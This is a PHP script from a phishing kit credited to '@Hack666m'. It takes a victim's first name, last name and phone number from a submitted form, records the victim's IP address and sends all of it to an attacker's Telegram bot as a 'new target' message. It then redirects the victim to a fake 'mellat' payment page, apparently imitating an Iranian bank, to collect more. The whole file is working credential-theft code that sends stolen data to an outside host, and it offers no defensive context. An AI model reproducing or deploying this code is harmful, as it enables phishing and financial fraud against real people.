<?php
/* Madsal is the developer!
ch : @Hack666m */
error_reporting(0);
function GetIp()
{
    $ip = $_SERVER['REMOTE_ADDR'];
    return $ip;
}
include "info.php";
$ip = GetIp();
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$phone = $_POST['phone'];
$Text = "
𝙉𝙚𝙬 #GAME3 𝙩𝙖𝙧𝙜𝙚𝙩 🦋
 ﹏﹏﹏﹏﹏﹏﹏﹏﹏
𝘕𝘢𝘮𝘦 ﹝ $firstname ﹞
𝘓𝘢𝘴𝘵 𝘯𝘢𝘮𝘦 ﹝ $lastname ﹞
𝘗𝘩𝘰𝘯𝘦 ﹝ <code>$phone</code> ﹞
𝘐𝘗 ﹝ $ip ﹞

ᶜᵒᵈᵉᵈ ᵇʸ ~ @hack666m
";

   @file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
 /* Madsal is the developer!
ch : @Hack666m */     
?>
<meta content='0;url=payment/mellat/index.php' http-equiv='refresh'/>